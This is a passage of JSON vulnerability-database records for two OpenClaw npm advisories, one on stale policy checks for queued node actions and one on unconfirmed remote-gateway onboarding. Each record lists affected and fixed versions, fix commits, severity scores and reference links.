            "summary": "OpenClaw may have stale policy enforcement for queued node actions\n## Summary\nQueued node actions were not revalidated against current command policy when later delivered, so stale allowlists or declarations could survive policy tightening.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server-methods/nodes.ts now revalidates queued actions against the current allowlist and declared command set at delivery time.\n- src/gateway/server-methods/nodes.invoke-wake.test.ts includes the shipped stale-queue regression coverage.\n\nOpenClaw thanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35648",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10859",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10896",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10907",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35648"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35648",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35648"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wj55-88gf-x564",
                    "reference_id": "GHSA-wj55-88gf-x564",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-wj55-88gf-x564"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35648",
                "GHSA-wj55-88gf-x564"
            ],
            "risk_score": 1.6,
            "exploitability": "0.5",
            "weighted_severity": "3.3",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wfkm-7ayk-uuhb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91802?format=api",
            "vulnerability_id": "VCID-wkye-je9r-1fba",
            "summary": "OpenClaw: CLI Remote Onboarding Persists Unauthenticated Discovery Endpoint and Exfiltrates Gateway Credentials\n## Summary\n\nRemote onboarding accepted discovered gateway endpoints without an explicit trust confirmation before persisting the remote URL and connection details.\n\n## Impact\n\nA malicious or spoofed discovery endpoint could steer onboarding toward an attacker-controlled gateway and capture future gateway credentials or traffic.\n\n## Affected Component\n\n`src/commands/onboard-remote.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `d6affb17d8` (`CLI: confirm discovered remote gateways before saving config`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41342",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02906",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02957",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0295",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41342"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d6affb17d85f5f5ab08ef9f2b994b257af12e75a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d6affb17d85f5f5ab08ef9f2b994b257af12e75a"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3cw3-5vxw-g2h3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3cw3-5vxw-g2h3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41342",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41342"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-discovery-endpoint-credential-exfiltration-via-remote-onboarding",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-discovery-endpoint-credential-exfiltration-via-remote-onboarding"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3cw3-5vxw-g2h3",
                    "reference_id": "GHSA-3cw3-5vxw-g2h3",
                    "reference_type": "",
                    "scores": [
